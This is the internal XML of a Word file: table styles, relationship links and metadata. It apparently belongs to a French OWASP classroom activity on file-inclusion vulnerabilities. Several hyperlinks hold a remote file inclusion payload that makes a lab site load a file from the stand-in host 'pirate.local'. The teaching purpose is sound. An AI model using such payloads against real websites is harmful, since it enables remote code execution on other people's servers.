    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="BorderedLined-Accent6">
    <w:name w:val="Bordered &amp; Lined - Accent 6"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>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color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE9D8" w:themeFill="accent6" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE9D8" w:themeFill="accent6" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Bordered">
    <w:name w:val="Bordered"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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paragraph" w:styleId="Rvision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0011432D"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Droid Sans Fallback" w:hAnsi="Arial" w:cs="Mangal"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="fr-FR"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ite-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reseaucerta.org/securisation-des-applications-web-owasp-activite1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><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ite-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId29"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ite-inclusion.local/index.php?file=contenu.pdf" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><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ite-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.site-inclusion.local/index.php?file=contenu.pdf" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><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swigger.net/burp/communitydownload" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt" TargetMode="Externa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header" Target="header3.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId3"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2745</Words>
  <Characters>15102</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>125</Lines>
  <Paragraphs>35</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17812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Sébastien Henriot</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <cp:lastPrinted>2023-11-07T12:32:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-17T20:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-07T12:32:00Z</dcterms:modified>
  <dc:language>fr-FR</dc:language>
</cp:coreProperties>
</file>